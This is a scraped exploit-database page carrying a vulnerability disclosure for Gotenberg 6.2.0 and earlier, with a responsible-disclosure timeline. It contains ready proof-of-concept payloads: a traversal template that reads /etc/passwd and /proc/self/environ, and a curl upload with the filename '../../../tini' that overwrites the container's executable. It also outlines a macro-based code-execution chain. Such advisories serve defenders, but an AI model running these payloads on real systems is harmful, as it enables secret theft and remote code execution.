0day.today - La mayor base de datos de exploits en el mundo.
![](/img/logo_green.jpg)
We use one main domain DOMAIN_LINK
If you want to purchase the exploit or pay for service, you need to buy Gold. We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Enviar ] rules
- Visit the [ Preguntas frecuentes ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ [email protected] ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
No puedes contactar por:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Gotenberg 6.2.0 Traversal / Code Execution / Insecure Permissions Vulnerabilities
Autor
Riesgo
![](/img/risk/critlow_4.gif)
Security Risk Critical
]0day-ID
Categoria
Fecha
CVE
Platforma
1 Multiple vulnerabilities in Gotenberg <= 6.2.0 ════════════════════════════════════════════════ Multiple vulnerabilities in Gotenberg (a Docker-powered stateless API for converting HTML, Markdown and Office documents to PDF used as a microservice) version <=6.2.0 allow a remote unauthenticated attacker to execute any command within Docker container. CVSSv3.1 chained score: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) Disclosure summary: [https://sploit.tech/2020/12/29/Gotenberg.html] Write-up: [https://blazej-adamczyk.medium.com/0-day-bug-breaks-multi-million-dollar-system-38c9e31b27e9] Exploit code: [https://github.com/br0xpl/gotenberg_hack] Video: [https://youtu.be/NAv8qovLtgI] 1.1 Download tirectory traversal ──────────────────────────────── CVE: CVE-2020-13449 Vendor: [https://www.thecodingmachine.com] Product: Gotenberg ([https://github.com/thecodingmachine/gotenberg]) Version: <=6.2.1 Description: Directory traversal vulnerability in Markdown engine of Gotenberg version 6.2.1 and lower allows unauthorized attacker to read any container files. PoC: 1. Create index.html file: ┌──── │ <!doctype html> │ <html lang="en"> │ <head> │ <meta charset="utf-8"> │ <title>My PDF</title> │ </head> │ <body> │ <pre style="white-space: pre-wrap;"> │ Path: │ {{ .DirPath }} │ PASSWD: │ {{ toHTML .DirPath "../../../../etc/passwd" }} │ IP: │ {{ toHTML .DirPath "../../../../proc/net/fib_trie" }} │ TCP: │ {{ toHTML .DirPath "../../../../proc/net/tcp" }} │ env: │ {{ toHTML .DirPath "../../../../proc/self/environ" }} │ </pre> │ </body> │ </html> └──── 2. Call markdown endpoint: ┌──── │ $ curl 'http://$URL_GOTENBERG/convert/markdown' --form [email protected]\ │ -o result.pdf --header 'Content-Type: multipart/form-data' └──── 1.2 Upload directory traversal ────────────────────────────── CVE: CVE-2020-13450 Vendor: [https://www.thecodingmachine.com] Product: Gotenberg ([https://github.com/thecodingmachine/gotenberg]) Version: <=6.2.1 Description: Directory traversal vulnerability in file upload function of Gotenberg version 6.2.1 and lower allows unauthorized attacker to upload and overwrite any writeable files outside the desired folder. This can lead to DoS, change program behaviour or even to code execution (see CVE-2020-13451). PoC: ┌──── │ curl 'http://$URL_GOTENBERG/convert/markdown' --form [email protected] \ │ --form "files=@tini;filename=../../../tini" -o res.pdf\ │ --header 'Content-Type: multipart/form-data' └──── 1.3 Code exec vulnerability using incomplete cleanup vulnerability ────────────────────────────────────────────────────────────────── CVE: CVE-2020-13451 Vendor: [https://www.thecodingmachine.com] Product: Gotenberg ([https://github.com/thecodingmachine/gotenberg]) Version: <=6.2.0 Description: Incomplete cleanup vulnerability in Office rendering engine of Gotenberg version 6.2.1 and lower allows unauthorized attacker (using a different vulnerability like CVE-2020-13450) to overwrite libreoffice config (profile) files and execute arbitrary code using macros. Gotenberg creates libreoffice profile when office endpoint is called in tmp choosing a folder with a name based on random ephemeral port number chosen by kernel. What is most important after finishing request the profile folder is not removed. Thus using a file upload vulnerability like the one described in CVE-2020-13450 an attacker can modify the profile preparing a macro which is going to be executed next time the same random profile will be reused. Analyzing kernel sources, in default kernel config, there will be about 14115 different ports choosen at random. The hack requires to retry many times but works reliably. Exploit code: [https://github.com/br0xpl/gotenberg_hack] 1.4 Insecure permissions of main executable ─────────────────────────────────────────── CVE: CVE-2020-13452 Vendor: [https://www.thecodingmachine.com] Product: Gotenberg ([https://github.com/thecodingmachine/gotenberg]) Version: <=6.2.1 Description: Insecure permissions of /tini (writeable by user gotenberg) file potentially allows an attacker to overwrite the file what can lead to Deny of Service or even code execution. 2 Timeline ══════════ • 25.05.2020 - Reported an issue: [[https://github.com/thecodingmachine/gotenberg/issues/199]]. • 04.06.2020 - Author confirms the issues and works on a fix. • 05.06.2020 - Pull request [[https://github.com/thecodingmachine/gotenberg/pull/208]] created. • 22.06.2020 - Fix merged to version 6.3.0. 3 Credits ═════════ Author: Blazej Adamczyk | [https://sploit.tech/] Team: Efigo [https://efigo.pl/] # 0day.today [2024-07-04] #